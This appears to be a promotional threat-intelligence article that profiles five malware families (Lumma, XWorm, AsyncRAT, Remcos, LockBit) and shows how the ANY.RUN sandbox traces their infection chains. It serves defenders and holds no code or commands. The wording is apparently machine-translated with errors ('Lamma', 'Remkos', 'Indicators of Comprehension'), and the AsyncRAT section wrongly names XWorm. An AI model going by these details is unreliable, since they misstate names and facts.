2024 saw many high-profile cyber attacks, with major companies such as Dell and TicketMaster falling victim to data breaches and other infrastructure breaches. In 2025, this trend will continue. Therefore, to be prepared for any malware attacks, every organization must know their cyber enemy in advance. Here are 5 common malware families you can start preparing against right now.
Lamma
Lumma is a widely available malware designed to steal sensitive information. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and extract data from targeted applications, including login credentials, financial information, and personal data.
Lumma is regularly updated to expand its capabilities. It can record detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can be used to install other malware on infected devices. In 2024, Lumma was distributed using various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.
Lumma Attack Analysis
Preventive analysis of suspicious files and URLs in the sandbox can effectively help you prevent Lumma infection.
Let’s see how you can do it with help Cloud sandbox ANY.RUN. Not only does it deliver final verdicts on malware and phishing along with effective indicators, it also allows you to interact with the threat and system in real-time.
Take a look at this analysis Lumma attacks.
 |
| ANY.RUN allows you to manually open files and run executables |
It starts with an archive containing an executable file. After running the .exe file, the sandbox automatically logs all processes and network activity, showing Lumma activities.
 |
| Suricata IDS informs us of a malicious connection to the C2 Lumma server |
It connects to its management server (C2).
 |
| A malicious process responsible for stealing data from the system |
It then starts collecting and deleting data from the machine.
 |
| You can use sandboxed IOCs to improve your detection systems |
Once the analysis is complete, we can export a report on this sample with all Critical Indicators of Comprehension (IOC) and TTP that can be used to enhance your organization’s defenses against potential Lumma attacks.
Try all features of ANY.RUN interactive sandbox for free with a 14-day trial
XWorm
XWorm is a malware that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial information, browsing history, saved passwords and cryptocurrency wallet data.
XWorm allows attackers to monitor a victim’s activities by tracking keystrokes, recording webcam images, listening to audio, scanning network connections, and viewing open windows. It can also access and manipulate a computer’s clipboard, potentially stealing cryptocurrency wallet credentials.
In 2024, XWorm was involved in many large-scale attacks, including those using CloudFlare tunnels and legitimate digital certificates.
XWorm Attack Analysis
 |
| Phishing emails are often the initial stage of XWorm attacks |
U this attackwe see the original phishing email with a link to Google Drive.
 |
| A Google Drive page with a link to download a malicious archive |
After clicking on the link, we are offered to download a password-protected archive.
 |
| A malicious archive with a .vbs file was opened |
You can find the password in the email. After entering it, we can access the .vbs script in the .zip file.
 |
| XWorm uses MSBuild.exe to persist to the system |
As soon as we run the script, the sandbox instantly detects malicious activities that eventually lead to the deployment of XWorm on the machine.
AsyncRAT
AsyncRAT is another remote access Trojan on the list. First spotted in 2019, it initially spread through spam, often using the COVID-19 pandemic as bait. Since then, the malware has gained popularity and has been used in various cyber attacks.
AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record the victim’s screen actions, log keystrokes, install additional malware, steal files, maintain a constant presence on infected systems, disable security software, and launch attacks that block targeted websites.
In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of sophisticated attacks using AI-generated scripts.
Analysis of the AsyncRAT attack
 |
| Initial archive with .exe file |
U this analysis sessionwe see another archive with a malicious executable inside.
 |
| The PowerShell process used to download the payload |
Exploding the file starts the XWorm execution chain, which involves using PowerShell scripts to retrieve additional files needed to facilitate the infection.
After the analysis is complete, the sandbox displays the final verdict on the sample.
Remkos
Remcos is malware that was marketed by its creators as a legitimate remote access tool. Since its launch in 2019, it has been used in numerous attacks to perform a wide range of malicious activities, including stealing sensitive information, remote system control, keystroke logging, screen capture, etc.
In 2024, Remcos distribution campaigns used techniques such as script-based attacks, often starting with VBScript that runs a PowerShell script to deploy the malware, and exploited vulnerabilities such as CVE-2017-11882 using malicious XML files .
Remcos Attack Analysis
 |
| Phishing email opened in ANY.RUN interactive sandbox |
U this examplewe came across another phishing email containing a .zip attachment and a password for it.
 |
| cmd process used during the infection chain |
The final payload uses the command line and Windows system processes to load and execute Remcos.
 |
| The MITER ATT&CK Matrix provides a comprehensive view of malware usage techniques |
The ANY.RUN sandbox maps the entire attack chain to the MITER ATT&CK matrix for convenience.
LockBit
LockBit is a ransomware that mainly targets Windows devices. It is considered one of the biggest ransomware threats, accounting for a significant portion of all ransomware-as-a-service (RaaS) attacks. The decentralized nature of the LockBit group has allowed it to compromise many prominent organizations around the world, including the UK’s Royal Mail and India’s National Aerospace Laboratories (in 2024).
Law enforcement took action against the LockBit group, which led to the arrest of several developers and partners. Despite these efforts, the group continues to work and plans to release a new version of LockBit 4.0 in 2025.
Analysis of the LockBit attack
 |
| The LockBit ransomware is launched in a secure ANY.RUN sandbox environment |
Departure this sandbox sessionshowing how quickly LockBit infects and encrypts files on the system.
 |
| ANY.RUN’s interactive sandbox allows you to see a static analysis of every changed file in the system |
Tracking the file system changes, we can see that it changed 300 files in less than a minute.
 |
| The ransom note instructs victims to contact the attackers |
The malware also sends a ransom note with detailed instructions on how to get your data back.
Improve your preventative security with ANY.RUN’s interactive sandbox
Proactively analyzing cyber threats instead of reacting to them as soon as they become a problem for your organization is the best course of action any business can take. Make it easy with ANY.RUN’s interactive sandbox, examining all suspicious files and URLs in a secure virtual environment, helping you identify malicious content with ease.
With the ANY.RUN sandbox, your company can:
- Quickly detect and confirm malicious files and links during routine scans.
- Explore how malware works at a deeper level to uncover their tactics and strategies.
- Respond more effectively to security incidents by gathering critical threat intelligence through sandbox analysis.
Experience all the features of ANY.RUN with a 14-day free trial.
